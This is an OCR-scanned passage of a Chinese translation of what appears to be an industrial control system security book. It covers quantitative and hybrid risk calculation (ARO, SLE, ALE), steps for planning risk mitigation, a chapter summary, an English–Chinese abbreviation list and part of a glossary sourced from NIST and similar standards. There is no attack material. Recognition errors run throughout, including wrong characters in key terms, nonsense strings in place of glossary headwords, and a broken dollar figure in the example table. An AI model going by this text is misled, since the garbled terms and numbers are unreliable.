2. 开 展 威胁 分 析 。 确 定 不 希望 的 事件 友 生 的 可 能 性 ， 从 而 预 估 全 年 友 生 率 (Annual Rate of Occurrence, ARO) 。 全 年 友 生 率 指示 了 在 一 年 之 中 威胁 会 出 
现 的 次 数 。 


3. 确 定年 度 损 失 期 望 值 (Annual Loss Expectancy, ALE) 。 将 潜在 损失 与 全 年 发 生 率 相 结合 ， 进 而 确定 风险 的 严重 程度 ， 这 就 是 年 度 损失 期 望 值 ， 计 算 方 
式 如 下 : 


全 年 发 生 率 (ARO) XX 单一 损失 期 望 (SLE) 三 年 度 损 失 期 望 (ALE) 
示例 : 
(ARO 为 10%， 也 就 是 说 每 10 年 发 生 1 次 ) .1x (SLE) $900000 = (ALE) $90000 


下 表 中 提供 了 一 些 例子 帮助 理解 上 述 公式 : 


这 些 内 容 在 理论 上 都 非常 好 ， 但 是 可 以 看 到 ， 定 性 分 析 通 党 不 会 为 全 方位 的 风险 评估 提供 足够 多 的 细节 信息 ， 而 定量 分 析 又 非常 复杂 和 繁琐 。 因 此 ， 更 加 实 
用 的 做 法 是 将 定性 分 析 与 定量 分 析 结 合 起 来 开展 混合 分 析 。 下 表 是 对 混合 分 析 方 法 进行 介绍 的 一 个 非常 好 的 示例 。 


高 (0.51-1+) $2 000 000 X 1.0=$2 000 000 
中 (0.21-0.5 ) $2 000 000 X 0.5=$1 000 000 
低 (0-0.2 ) $2 000 000 X 0.2=$ 00 000 


混合 分 析 方 法 利用 了 定量 分 析 的 优势 ， 分 别 对 可 能 性 和 影响 做 出 了 高 、 中 、 低 级 别 值 的 评级 ， 然 后 同 定 量 的 成 本 效益 分 析 数 值 相 结合 。 暴 露 因子 (EF) WR 
示范 围 及 用 定性 分 析 得 到 的 可 能 性 数值 表示 ， 年 度 损失 期 望 值 或 全 年 友 生 率 (取决 于 用 户 所 需要 的 准确 性 或 复杂 性 程度 ) 则 以 美元 金额 表示 ， 其 范围 同 及 用 定性 
分 析 得 到 的 影响 值 有 关 。 该 方法 提供 了 一 种 简化 方法 (很 像 之 前 在 风险 评估 过 程 中 计算 天 键 性 的 方法 ) 进行 风险 计算 ， 而 且 这 种 方法 也 能 够 有 效 地 确定 成 本 效 
葵 。 例 如 ， 如 果 我 们 决定 选择 一 项 花费 20 万 美金 的 风险 缓解 方案 ， 那么 只 有 在 中 等 可 能 性 和 中 等 影响 范围 之 内 或 者 超过 这 个 范围 的 风险 友 生 时 ， 该 解决 方案 才 会 
具有 较 高 的 成 本 效益 。 


10.6.4 ”风险 缓解 筑 略 的 制订 


随 着 相关 信息 的 获取 和 分 析 ， 可 以 对 部 署 的 缓解 措施 、 地 点 、 时 间 及 对 不 予 部 署 的 对 象 等 做 出 合理 的 决策 。 图 10-3 (同样 也 是 第 2 章 的 图 2-2) 摘 述 了 制订 和 风 
台 缓 解 策 略 的 完整 过 程 。 
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图 10-3 工控 系统 风险 评估 步骤 
这 里 简要 地 描述 了 风险 缓解 策略 规划 或 者 风险 计算 阶段 中 所 涉及 的 步骤 : 
1. 研 究 并 对 提出 的 每 个 风险 缓解 解决 方案 的 成 本 进行 预 估 ; 
2. 从 最 关键 且 最 易于 暴露 的 资产 开始 ， 将 绥 解 成 本 同 潜在 入 侵 所 导致 的 影响 或 成 本 进行 比较 ; 
3. 根 据 已 知 数据 ， 通 过 回答 下 述 问题 制订 缓解 策略 : 
-总体 预算 有 多 少 ? 
+ 哪些 是 最 关键 且 最 易于 暴露 的 资产 ? 
入 侵 产 生 的 总 体 成 本 或 影响 如 何 ? 
` 入 侵 成 功 的 可 能 性 有 多 大 ? 
+ 风险 缓解 的 成 本 会 超过 风险 带 来 的 损失 吗 ? 
4. 根 据 预 算 和 策略 部 署 风 险 缓解 方案 。 


下 面 这 些 步骤 将 在 风险 评估 、 威 胁 建 模 、 渗 透 测试 以 及 风险 场景 中 获得 的 所 有 信息 融入 到 风险 缓解 策略 当中 。 这 些 步骤 和 问题 有 助 于 制订 策略 的 基本 框架 。 
其 目的 是 在 提出 的 每 项 控制 措施 实施 之 后 ， 根 据 风险 降低 的 级 别 判断 实施 该 项 控制 措施 的 成 本 是 否 合 理 。 正 如 本 章 开 头 所 提 到 的 ， 防 御 策 略 只 不 过 是 对 机 构 如 何 
处 理 风险 的 规划 。 风 险 缓解 策略 的 基础 在 于 应 对 本 章 开 头 定义 的 风险 的 四 种 基本 方式 。 同 时 ， 还 要 记 住 需要 对 以 下 问题 进行 思考 : 


-需要 考虑 到 控制 措施 自身 可 能 带 来 的 影响 (例如 ， 控 制 措施 会 妨碍 生产 吗 ? 它 需要 额外 的 支持 人 员 吗 ? ) 


. 记 住 要 考虑 同 影响 有 关 的 所 有 成 本 ， 包 括 系统 更 换 、 法 律 诉 讼 、 收 入 损失 、 公 关 成 本 等 ; 


. 需要 考虑 到 如 果 不 实施 缓解 策略 而 导致 潜在 问题 暴露 的 成 本 (也 就 是 接受 风险 ) ; 


. 将 缓解 成 本 同 潜在 影响 进行 比较 。 


10.7 ABS 


风险 缓解 策略 本 质 上 是 机 构 对 如 何 处 置 风 险 的 规划 。 许 多 机 构 花 费 了 大 量 预算 和 人 资源 用 于 部 署 安全 控制 措施 和 风险 缓解 策略 。 但 是 ， 只 有 与 适当 的 风险 评估 
过 程 相 结 合 ， 使 用 威胁 建 模 来 构建 可 行 风险 场景 与 使 用 渗透 测试 对 这 些 场景 进行 验证 时 ， 才 能 够 构建 高 效 、 经 济 并且 具 有 针对 性 的 风险 缓解 策略 。 本 章 关 注 于 与 
工控 系统 环境 和 攻击 相关 的 风险 缓解 策略 及 对 抗 措 施 的 实施 。 


读 完 本 书 之 后 ， 读 者 们 应 该 对 总 体 的 工控 系统 评估 与 缓解 过 程 有 所 了 解 ， 包 括 利用 风险 建 模 构建 风险 场景 ， 以 及 使 用 能 够 保障 工控 系统 环境 安全 的 渗透 测试 
方法 对 这 些 场 景 进行 验证 。 
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附录 A ” 缩 略语 表 


AC (alternating current) ， 交 流 电 

ACL (Access Control List) ， 访 问 控制 列表 

AGA (American Gas Association) ， 美 国 燃气 协会 

API (American Petroleum Institute) ， 美 国 石油 协会 

ARP (Address Resolution Protocol) ， 地 址 解析 协议 

BCP (Business Continuity Plan) ， 业 务 连续 性 规划 

CIDX (Chemical Industry Data Exchange) ， 化 工 数据 交换 

CIGRE (International Council on Large Electric Systems) ， 国 际 大 电网 会 议 
CIP (Critical Infrastructure Protection) ， 关 键 基础 设施 保护 

CMVP (Crgptographic Module Validation Program) ， 密 码 模块 验证 流程 
COTS (commercial off-the-shelf) ， 商 用 产品 或 技术 

CPNI (Centre for the Protection of National Infra-structure) ， 国 家 基础 设施 保护 中 心 
CPU (central processing unit) ， 中 央 处 理 器 

CSE (Communications Security Establishment) ， 通 信安 全 局 

CSRC (Computer Security Resource Center) ， 计 算 机 安全 资源 中 心 

CSSC (Control System Security Center) ， 控 制 系统 安全 中 心 

CVE (Common Vulnerabilities and Exposures) ,公共 漏洞 库 

DCOM (Distributed Component Object Model) ， 分 布 式 组 件 对 象 模型 
DCS (Distributed Control System (s) ) ， 集 散 控 制 系统 

DETL (Distributed Energy Technology Labora-tory) ， 分 布 式 能 源 技 术 实验 室 
DHS (Department of Homeland Security) ， 国 土 安全 部 (美国 ) 

DMZ (demilitarized zone) ， 非 军事 区 

DNP3 (Distributed Network Protocol (published as IEEE1815) ) ， 分 布 式 网 络 协议 ( 详 见 IEEE1815) 
DNS (Domain Name System) ， 域 名 系统 

DOE (Department of Energy) ， 能 源 部 (美国 ) 

DoS (denial of service) ， 拒 绝 服务 

DRP (Disaster Recovery Plan) ， 灾 难 恢复 计划 

EAP (Extensible Authentication Protocol) ， 可 扩展 身份 验证 协议 

EMS (Energy Management System) ， 能 源 管理 系统 

EPRI (Electric Power Research Institute) ， 电 力 科 学 研究 院 (美国 ) 

ERP (Enterprise Resource Planning) ， 企 业 资 源 规划 

FIPS (Federal Information Processing Standards) ， 联 邦 信息 处 理 标 准 
FISMA (Federal Information Security Moderniz-ation Act) ， 联 邦 信息 安全 管理 法 案 


FTP (File Transfer Protocol) ， 文 件 传 输 协 议 


GAO (Government Accountability Office) ， 美 国 审计 总 署 

GPS (Global Positioning System) ， 全 球 定位 系统 

HMI (Human-Machine Interface) ， 人 机 界面 

HSPD (Homeland Security Presidential Directive) ， 国 土 安全 总 统 令 

HTTP (Hypertext Transfer Protocol) ， 超 文本 传输 协议 

HTTPS (Hypertext Transfer Protocol Secure) ， 安 全 超 文本 传输 协议 

HVAC (Heating, Ventilation, and Air Conditioning) 空调 系统 

I/O (Input/Output) ， 输 入 /输出 

I3P (Institute for Information Infrastructure Protec-tion) ， 信 息 基础 设施 保护 研究 所 
IACS (Industrial Automation and Control Sy-stem) ， 工 业 自动 化 控制 系统 
IAONA (Industrial Automation Open Networking Association) ， 工 业 自 动 化 开放 网 络 联盟 
ICCP (Inter-control Center Communications Protocol) ， 控 制 中 心间 通信 协议 
ICMP (Internet Control Message Protocol) ， 互 联网 控制 报 文 协议 

ICS (industrial control system) ， 工 业 控 制 系统 

ICS-CERT (Industrial Control Systems-Cyber Emergency Response Team) ， 工 控 系 统 网 络 应 急 响 应 小 组 
IDS (intrusion detection system) ， 入 侵 检 测 系 统 

IEC (International Electrotechnical Commission) ， 国 际 电 工 委员 会 

IED (Intelligent Electronic Device) ， 智 能 电子 设备 

IEEE (Institute of Electrical and Electronics Engineers) ， 电 气 和 电子 工程 师 协 会 
IETF (Internet Engineering Task Force) ， 国 际 互 联网 工程 任务 组 

IGMP (Internet Group Management Protocol) ， 互 联网 组 管理 协议 

INL (Idaho National Laboratory) ， 爱 达 荷 国家 实验 室 

IP (Internet Protocol) ， 网 络 互联 协议 

IPS (intrusion prevention system) ， 人 入侵 防御 系统 

IPsec (Internet Protocol Security) ， 互 联网 安全 协议 

ISA (International Society of Automation) ， 国 际 自动 化 协会 

ISID (Industrial Security Incident Database) ， 工 业 信 息 安 全 事故 数据 库 

ISO (International Organization for Standardiz-ation) ， 国 际 标准 化 组 织 

IT (information technology) ， 信 息 技 术 

ITL (Information Technology Laboratory) ， 信 息 技术 实验 室 

LAN (local area network) ， 局域网 

MAC (Media Access Control) ， 介 质 访问 控制 

MES (Manufacturing Execution System) ， 制 造 执行 管理 系统 


MIB (Management Information Base) ， 管 理 信 息 库 


MTU (Master Terminal Unit (also Master Teleme-try Unit) ) ， 主 终端 设备 

NAT (Network Address Translation) ， 网 络 地 址 转换 

NCCIC (National Cybersecurity and Communica-tions Integration Center) ， 国 家 信息 安全 和 通信 集成 中 心 (美国 ) 
NCSD (National Cyber Security Division) ， 国 家 网 络 安全 局 (美国 ) 

NERC (North American Electric Reliability Council) ， 北 美 电 力 可 靠 性 委员 会 

NFS (Network File System) ， 网 络 文件 系统 

NIC (Network Interface Card) ， 网 络 适 配器 

NISCC (National Infrastructure Security Coord-ination Centre) ， 国 家 基础 设施 安全 协调 中 心 (英国 ) 
NIST (National Institute of Standards and Tech-nology) ， 美 国 国 家 标准 技术 研究 院 
NSTB (National SCADA Testbed) ， 国 家 SCADA 测 试 床 计划 

OLE (object linking and embedding) ， 对 象 链接 与 谷 入 技术 

OMB (Office of Management and Budget) ， 美 国 行政 管理 和 预算 局 

OPC (OLE for Process Control) ， 基 于 过 程控 制 中 的 对 象 链接 与 奉 入 

OS (operating system) ， 操 作 系 统 

OSI (Open Systems Interconnection) ， 开 放 式 系统 互联 

PCII (Protected Critical Infrastructure Informa-tion) ， 关 键 基础 设施 信息 保障 计划 
PDA (personal digital assistant) ， 个 人 数字 助理 

PIN (personal identification number) ， 个 人 身份 识别 码 

PID (proportional-integral-derivative) ， 比 例 积 分 微分 控制 器 

PIV (personal identity verification) ， 个 人 身份 验证 

PLC (Programmable Logic Controller) ， 可 编程 序 控制 器 

PoC (proof of concept) ， 概 念 验证 

PP (Protection Profile) ， 保 护 轮 请 

PPP (Point-to-Point Protocol) ， 点 对 点 协议 

R&D (research and development) ， 研 发 

RADIUS (Remote Authentication Dial-in User Service) ， 远 程 用 户 拨号 认证 服务 
RBAC (Role-Based Access Control) ， 基 于 角色 的 访问 控制 

RFC (Request for Comments) ，RFC 规 泄 

RMA (Reliability, Maintainability, and Availabi-lity) ， 可 靠 性 、 可 维护 性 和 可 用 性 
RMF (Risk Management Framework) ， 风 险 管理 框架 

RPC (Remote Procedure Call) ， 远 程 过 程 调 用 

RPO (Recovery Point Objective) ， 数 据 恢 复 点 目标 

RTO (Recovery Time Objective) ， 恢 复 时 间 目 标 


RTU (Remote Terminal Unit (also Remote Tele-metry Unit) ) ， 远 程 终端 单元 (远程 单元 ) 


SC (Security Category) ， 安 全 分 类 

SCADA (Supervisory Control and Data Acquisi-tion) ， 监 控 和 数据 采集 系统 

SCP (Secure Copy) ， 安 全 复制 

SFTP (Secure File Transfer Protocol) ， 安 全 文件 传送 协议 

SIS (Safety Instrumented System) ， 安 全 仪表 系统 

SMTP (Simple Mail Transfer Protocol) ， 简 单 邮 件 传输 协议 

SNL (Sandia National Laboratories) ， 美 国 圣地 亚 国家 实验 室 

SNMP (Simple Network Management Protocol) ， 简 单 网 络 管理 协议 

SP (Special Publication) ， 特 别 出 版 物 

SPP-ICS (System Protection Profile for Industrial Control Systems) ， 工 业 控 制 系统 系统 保护 规范 
SQL (Structured Query Language) ， 结 构 化 查询 语言 

SSH (Secure Shell) ， 安 全 shell 协 议 

SSID (Service Set Identifier) ， 服 务 集 标识 符 

SSL (Secure Sockets Layer) ， 安 全 套 接 字 层 

TCP (Transmission Control Protocol) ， 传 输 控 制 协议 

TCP/IP (Transmission Control Protocol/Internet Protocol) ， 传 输 控制 协议 /网 络 互联 协议 
TFTP (Trivial File Transfer Protocol) ， 简 单 文件 传输 协议 

TLS (Transport Layer Security) ， 安 全 传输 层 协 议 

UDP (User Datagram Protocol) ， 用 户 数据 报 协议 

UPS (uninterruptible power supply) ， 不 间断 电源 

US-CERT (United States Computer Emergency Readiness Team) ， 美 国 计 算 机 应 急 响 应 小 组 
USB (Universal Serial Bus) ， 通 用 串 行 总 线 

VFD (Variable Frequency Drive) ， 变 频 器 

VLAN (virtual local area network) ， 虚 拟 局 域 网 

VPN (virtual private network) , 虚拟 专用 网 

WAN (wide area network) ， 广 域 网 


XML (Extensible Markup Language) ， 可 扩展 标记 语言 


附录 B 术语 表 


访问 控制 列表 (Access Control List, ACL) ”一 种 访问 控制 机 制 ， 通 过 枚 举 允许 访问 系统 资源 的 系统 实体 身份 来 实现 对 系统 资源 的 访问 控制 。 (来 源 : 
RFC4949) 


认可 (accreditation) ”基于 商定 的 安全 控制 措施 实现 方式 ， 由 认证 机 构 高 级 官员 制订 的 官方 管理 决策 ， 用 于 对 信息 系统 的 运行 进行 授权 并 明确 接受 机 构 运 
行 (包括 任务 、 职 能 、 形 象 或 声誉 方面 ) 的 风险 、 机 构 资 产 的 风险 或 个 人 的 风险 。 (来 源 : NIST SP800-53) 


主动 安全 测试 (active security test) ”直接 与 目标 进行 交互 的 安全 测试 ， 例 如 向 目标 友 送 数据 包 。 (来 源 : NIST SP800-115) 


执行 器 (actuator) “用 于 对 机 械 妆 置 或 系统 进行 移动 或 控制 的 设备 。 执 行 器 由 能 量 进行 驱动 操控 ， 并 将 该 能 量 转换 成 运动 ， 驱 动能 源 通 冲 是 电流 、 液 压 或 
气压 。 执 行 器 是 控制 系统 作用 于 环境 的 装置 。 控 制 系 统 可 以 非常 简单 (固定 的 机 械 或 电子 系统 ) ， 可 以 是 基于 软件 的 〈 例 如 ， 打 印 机 驱动 或 机 器 人 控制 系统 ) 、 
还 可 以 是 人 或 其 他 机 构 。 (来 源 : NIST SP800-82) 


警报 (alarm) ”通过 声音 或 者 图 像 、 抑 或 两 者 结合 的 明显 变化 来 指示 存在 异常 状况 的 沪 置 或 功能 ， 以 便 引起 对 异常 状况 的 注意 。 (来 源 : ANSI/ISA-5.1- 
2009) 


交流 驱动 (alternating current drive) ”与 变频 驱动 (VFD) 同 义 。 (来 源 : NIST IR6859) 

反 病 毒 工具 (antivirus tools) ” 用 于 检测 恶意 代码 ， 防 止 其 感染 系统 ， 以 及 删除 已 感染 系统 中 恶意 代码 的 软件 产品 和 技术 。 (来 源 : NIST SP800-82) 
应 用 服务 器 (application server) ”负责 将 应 用 程序 托管 到 用 户 工作 站 的 计算 机 。 (来 源 : NIST SP800-82) 

应 用 程序 白 名 单 (Application Whitelisting, AWL) ”参见 白 名 单 

攻击 (attack) ”对 系统 服务 、 资 源 或 信息 进行 未 授权 访问 的 尝试 ,或 者 威胁 系统 完整 性 、 可 用 性 或 机 密 性 的 尝试 。 (来 源 : CNSSI-4009) 

zsh!) (authentication) “对 用 户 、 进 程 或 设备 的 身份 进行 验证 ， 通 党 是 允许 访问 信息 系统 中 资源 的 先决 条 件 。 (来 源 : NIST SP800-53) 

授权 (authorization) ”赋予 系统 实体 访问 系统 资源 的 权利 或 权限 。 (来 源 : RFC4949) 

可 用 性 (availability) ”确保 用 户 能 够 及 时 可 靠 地 访问 和 使 用 信息 、 数 据 以 及 系统 的 能 力 。 (来 源 : NIST SP800-30， 改 版 ) 

Jal] (backdoor) ”对 计算 机 系统 的 未 公开 访问 方式 。 后 门 是 一 种 潜在 的 安全 风险 。 (来 源 : NIST SP800-82) 


标志 获取 (banner grabbing) ”获取 标志 信息 的 过 程 ， 当 建立 连接 时 标志 信息 主要 通过 远程 端口 进行 友 送 ， 例 如 应 用 程序 类 型 和 版 本 (来源: NIST 
SP800-115) 


批 处 理 (batch process) ”使 用 一 套 或 多 套 设备 ， 在 有 限 的 时 间 内 对 大 量 输入 进行 有 序 处 理 后 ， 得 到 有 限量 输出 的 过 程 。 (来 源 : ANSI/ISA-88.01-1995) 
广播 (broadcast) ”在 不 知道 接收 方 的 情况 下 ， 向 网 络 中 的 所 有 设备 发送 消息 的 过 程 。 (来 源 : IEC/PAS62410) 


缓冲 区 溢出 (buffer overflow) ” 当 输 入 长 度 超过 预先 分 配 的 缓冲 区 或 数据 存储 区 的 存储 容量 时 ， 输 入 数据 覆盖 掉 其 他 信息 的 情况 。 此 时 ， 攻 击 者 会 对 这 种 
情形 进行 漏洞 利用 导致 系统 崩溃 或 者 插入 特别 定制 的 代码 ， 从 而 获得 系统 的 控制 权 。 (RIR: NIST SP800-28) 


认证 (certification) ”对 信息 系统 中 管理 、 操 作 以 及 技术 型 安全 控制 措施 的 综合 评估 ， 对 安全 认可 提供 支持 用 以 确定 控制 措施 正确 实施 以 及 按照 预定 计划 开 
展 的 程度 ， 从 而 得 到 关于 系统 是 否 满足 安全 要 求 的 结果 。 (来 源 : NIST SP800-37) 


明文 (clear text) ”未 加 密 的 信息 。 (来 源 : NIST SP800-82) 


通信 路 由 (communications router) ”在 两 个 网 络 之 间 传 输 消 息 的 通信 设备 。 路 由 器 的 常见 用 途 包括 将 LAN 连 接 到 WAN， 以 及 将 MTU 和 RTU 连 接 到 用 于 
SCADA 通 信 的 远程 网 络 介质 。 (来 源 : NIST SP800-82) 


机 密 性 (confidentiality) “信息 访问 和 披露 的 授权 限制 ， 包 括 保护 个 人 隐私 和 专 有 信息 的 手段 。 (来 源 : NIST SP800-53) 


(系统 或 设备 的 ) “AS (configuration[of a system or device]) ”系统 设计 中 的 一 个 步骤 ， 例 如 对 功能 单元 的 选择 、 对 位 置 的 分 配 以 及 对 通联 关系 的 定 
X. (来 源 : IEC/PAS62409) 


配置 控制 (configuration control) ”控制 对 硬件 、 固 件 、 软 件 以 及 文档 加 以 改动 的 过 程 ， 以 确保 在 系统 实施 之 前 、 期 间 和 之 后 对 信息 系统 进行 保护 使 之 免 
遭 不 当 的 修改 。 (来 源 : CNSSI-4009) 


对 抗 措 施 (countermeasure) 参见 安全 控制 |。 
寺 续 过 程 (continuous process) ”与 批量 、 间 歇 或 顺序 操作 相对 ， 基 于 连续 流 操作 的 过 程 。 (来 源 : NIST SP800-82) 


控制 (control) ”工控 系统 中 用 于 对 物理 过 程 进行 监控 和 控制 的 部 分 。 包 括 所 有 控制 服务 器 、 现 场 设备 、 执 行 器 、 传 感 器 及 其 支持 的 通信 系统 。 (来 源 : 
NIST SP800-82) 


控制 算法 (control algorithm) ”所 要 执行 的 控制 操作 的 数学 表示 。 (来 源 : 自动 化 、 系 统 和 仪器 字典 ，Theodore G.Dimon，[ 国 际 自动 化 协会 ，2001]) 
控制 中 心 (control center) ”对 过 程 进行 测量 、 控 制 和 (或 ) 监控 的 设备 结构 或 结构 组 。 (来 源 : ANSI/ISA-51.1-1979) 


控制 回路 (control loop) ”控制 回路 由 用 于 测量 的 传感器 、 控 制 器 硬件 (如 PLC) 、 执 行 器 (如 控制 阀 、 断 路 器 、 开 关 和 电动 机 ) 以 及 变量 间 的 通信 组 成 。 
传感器 将 受 控 变量 传输 到 控制 器 ， 然 后 由 控制 器 对 信号 进行 解释 ， 并 基于 设 定点 生成 相应 的 操纵 变量 ， 再 传送 到 执行 器 。 由 干扰 造成 的 过 程 变化 会 导致 出 现 新 的 
传感器 信号 ， 从 而 识别 过 程 的 状态 ， 并 再 次 传送 到 控制 器 。 (来 源 : NIST SP800-82) 


控制 网 络 (control network) ”企业 网 络 通 常 连接 到 控制 物理 过 程 ， 并 且 是 对 时 效 性 或 安全 性 起 关键 作用 的 设备 。 控 制 网 络 可 以 进一步 按 区 域 细 分 ， 并 且 在 
一 个 企业 和 站 点 内 可 以 有 多 个 单独 的 控制 网 络 。 (来 源 : 1SA99) 


控制 服务 器 (control server) ”控制 服务 器 是 一 种 可 以 作为 服务 器 的 控制 器 ， 其 中 可 以 部 署 控制 软件 ， 由 控制 软件 同 底层 控制 设备 进行 交互 ， 底 层 控制 设备 
包括 远程 终端 单元 (RTU) 、 可 编程 序 控制 器 (PLC) 等 。 在 SCADA 系 统 中 ， 控 制服 务 器 通常 称 为 SCADA 服 务 器 、MTU 或 监控 控制 器 。 (来 源 : NIST SP800- 
82) 


控制 系统 (control system) ”通过 有 意 引导 或 操纵 来 使 某 一 变量 达到 规定 值 的 系统 。 控 制 系统 包括 SCADA、DCS、PLC 和 其 他 类 型 的 工业 度量 和 控制 系 
统 。 (来 源 : NIST SP800-82) 


受 控 变 量 (controlled variable) ”控制 系统 试图 在 设 定点 保存 的 变量 。 设 定点 可 以 是 常量 ， 也 可 以 是 变量 。 (来 源 : 自动 化 、 系 统 和 仪器 字典 ) 
控制 器 (controller) ”自动 管理 受 控 变量 的 设备 或 程序 。 (来 源 : ANSI/ISA-51.1-1979) 

隐蔽 测试 (covert test) ”在 不 知道 组 织 上 T 人 员 架 构 ， 但 是 了 解 上 层 管 理 权限 的 情况 下 ， 采 用 隐蔽 方法 所 开展 的 测试 。 (来 源 : NIST SP800-115) 
重要 性 (criticality) ” 对 某 组 织 成 功 完成 某 一 任务 或 者 开展 某 一 业务 时 对 信息 或 信息 系统 依赖 程度 的 度量 。 (来 源 : NIST SP800-30) 


循环 时 间 (cycle time) ”控制 器 完成 一 个 控制 回路 的 时 间 (通常 以 秒 为 单位 ) ， 其 中 包括 将 传感器 信号 读 入 存储 器 、 执 行 控制 算法 ， 以 及 将 相应 的 控制 信号 
传输 到 执行 器 ， 由 控制 器 对 信号 进行 处 理 从 而 产生 新 的 传感器 信号 。 (来 源 : 自动 化 、 系 统 和 仪器 字典 ) 


数据 二 极 管 (data diode) ”数据 二 极 管 (也 称 为 单 向 网 关 、 确 定性 单 向 边界 设备 或 单 向 网 络 ) 是 一 种 仅 允 许 数据 在 一 个 方向 上 传播 的 网 络 装置 或 设备 。 
(来 源 : NIST SP800-82) 


数据 库 (database) ”通常 是 保存 三 级 信息 的 信息 库 ， 包 括 过 程 数据 、 工 作 程序 、 人 员 数 据 和 财务 数据 。 (来 源 : NIST IR6859) 
工业 实时 历史 数据 库 (data historian) ”支持 通过 统计 过 程控 制 技术 进行 数据 分 析 的 集中 式 数 据 库 。 (来 源 : NIST SP800-82) 


直流 伺服 驱动 器 (DC servo drive) ”一 种 专门 适用 于 伺服 电机 的 驱动 器 。 直 流 伺 服 驱 动 器 向 电机 发 送 命令 ， 并 接收 来 自 伺服 电机 分 解 器 或 编码 器 的 反馈 。 
(来 源 : NIST IR6859) 


非 军 事 区 (Demilitarized Zone, DMZ) 1) 防火 墙 上 具有 路 由 功能 的 接口 ， 同 防火 墙 受 保护 一 侧 的 接口 相 类 似 。DMZ 同 防火 墙 受 保护 一 侧 的 其 他 接口 之 
间 的 流量 仍然 通过 防火 墙 ， 并 且 可 以 应 用 防火 墙 保 护 策略 。 (来 源 : NIST SP800-41) 


2) 在 机 构 专 用 网 络 和 互联 网 之 间作 为 “中 立 区 域 ”插入 的 主机 或 网 段 。 (来 源 : NIST SP800-45) 
3) 在 内 部 和 外 部 网 络 之 间 逻 辑 上 的 网 络 边界 网 段 。 


目的 是 为 了 同 外 部 信息 进行 交换 而 强制 实施 内 部 网 络 的 信息 保障 策略 ， 限 制 外 部 的 非 信 任 源 对 信息 进行 访问 ， 同 时 为 内 部 网 络 屏 菩 外 部 攻击 。 (来 源 : 
CNSSI-4009) 


拒绝 服务 攻击 (Denial of Service, DoS) ”阻止 对 系统 资源 的 授权 访问 或 延迟 系统 操作 和 运行 。 (来 源 : RFC4949) 


诊断 (diagnostics) ”有 关 已 知 故障 模式 及 其 特性 的 信息 。 诊 断 信息 可 用 于 故障 排除 以 及 故障 分 析 ， 以 帮助 查 明 故 障 原因 ， 并 拟 制 适当 的 整改 措施 。 (来 
源 : 自动 化 、 系 统 和 仪器 字典 ) 


灾难 恢复 计划 (Disaster Recovery Plan, DRP) ”在 硬件 或 软件 出 现 重 大 故障 或 设施 损坏 时 ， 用 于 处 理 关 键 应 用 程序 的 书面 计划 。 (来 源 : NIST SP800- 
34) 


mau (discrete process) ”以 指定 数量 的 原料 为 单元 (要素 或 一 组 要 素 ) 在 工作 站 之 间 移 动 的 过 程 ， 其 中 每 个 单元 保持 其 唯一 特性 。 (来 源 : 自动 化 、 
系统 和 仪器 字典 ) 


集散 控制 系统 (DCS) ”在 控制 系统 中 ， 集 散 控 制 系 统 是 指 分 布 在 控制 过 程 中 所 实现 的 智能 控制 ， 而 不 是 由 位 于 中 心 的 单个 单元 所 实现 的 控制 。 (来 源 : B 
动 化 ， 系 统 和 仪器 字典 ) 


分 布 式 工厂 (distributed plant) ”企业 能 够 通过 互联 网 访问 到 的 位 于 不 同 地 点 的 工厂 。 (来 源 : NIST IR6859) 
干扰 (disturbance) ”系统 中 变量 的 意外 改变 可 能 对 受 控 变 量 的 值 施 加 的 不 利 影响 。 (来 源 : ANSI/ISA-51.1-1979) 


域 (domain) ”包括 一 组 系统 资源 和 一 组 系统 实体 的 环境 或 上 下 文 ， 这 些 系统 实体 有 权 访 问 由 公共 安全 策略 、 安 全 模型 或 安全 体系 结构 所 定义 的 资源 。 (来 
源 : CNSSI-4009; SP800-53; SP800-37) 


域 控制 器 (domain controller) ”负责 管理 域 信息 (如 登录 标识 和 口令 ) 的 服务 器 。 (来 源 : NIST IR6859) 


加 密 (encryption) ”为 防止 数据 的 公开 或 使 用 ， 将 数据 ( 称 为 明文 ，plaintext) 转换 为 隐藏 数据 原始 含义 (MAX, ciphertext) 的 密码 学 变换 。 如 果 
变换 是 可 逆 的 ， 则 相应 的 反 向 过 程 称 之 为 解密 (decryption) ， 即 将 加 密 数据 恢复 到 其 原始 状态 的 变换 。 (来 源 : RFC4949) 


企业 (enterprise) ”能 够 对 一 个 或 多 个 处 理 站 点 的 运行 加 以 协调 的 组 织 。 (来 源 : ANSI/ISA-88.01-1995) 


企业 资源 规划 系统 (Enterprise Resource Planning System, ERP) ”对 企业 范围 内 信息 进行 整合 的 系统 ， 包 括 人 力 资源 、 财 务 、 制 造 和 分 销 ， 并 能 够 建立 
机 构 与 客户 以 及 供应 商 之 间 的 联系 。 (来 源 : NIST SP800-82) 


可 扩展 标记 语言 (Extensible Markup Language, XML) ”采用 简单 的 、 可 读 的 标签 对 数据 进行 标记 的 一 种 通用 语法 规范 ， 借 助 该 规范 能 够 实现 程序 之 
间 、 机 构 之 间 的 数据 定义 、 传 输 、 验 证 与 解释 。 (来 源 : NIST SP800-82) 


外 部 安全 测试 (external security test) ”从 机 构 安全 边界 之 外 所 开展 的 安全 测试 。 (来 源 : NIST SP800-115) 
误 报 (false positive) ”指示 存在 漏洞 的 错误 警报 。 (来 源 : NIST SP800-115) 
容错 (fault tolerant) ”在 存在 硬件 以 及 (或 者 ) 软件 故障 的 情况 下 ， 系 统 继续 正确 执行 其 预定 功能 的 内 置 能 力 。 (来 源 : NIST SP800-82) 


现场 设备 (field device) ” 同 工 控 系统 现场 端 相 连接 的 设备 。 现 场 设 备 的 类 型 包括 RTU、PLC、 执 行 器 、 传 感 器 、 人 机 界面 以 及 与 之 相关 联 的 通信 。 (来 
源 : NIST SP800-82) 


现场 (field site) ”工控 系统 中 由 物理 、 地 理 或 者 逻辑 分 段 进行 标识 的 子 系统 。 现 场 可 以 包含 RATU、PLC、 执 行 器 、 传 感 器 、 人 机 界面 以 及 与 之 相关 联 的 通 
言 。 (来 源 : NIST SP800-82) 


现场 总 线 (fieldbus) ”底层 工业 现场 设备 (如 传感器 、 变 送 器 、 执 行 器 、 本 地 控制 器 ， 甚 至 控制 室 设 备 ) 之 间 的 数字 化 、 串 行 、 多 点 、 双 向 数据 总 线 、 通 信 
路 径 或 者 链 路 。 现 场 总 线 反 术 的 应 用 消除 了 控制 器 和 每 个 设备 之 间 点 对 点 连 线 的 需求 。 需 要 采用 协议 对 现场 忌 线 网 络 之 间 传 输 的 消息 进行 定义 ， 其 中 每 个 消息 均 


能 够 对 网 络 中 的 特定 传感器 进行 标识 。 (来 源 : NIST SP800-82) 
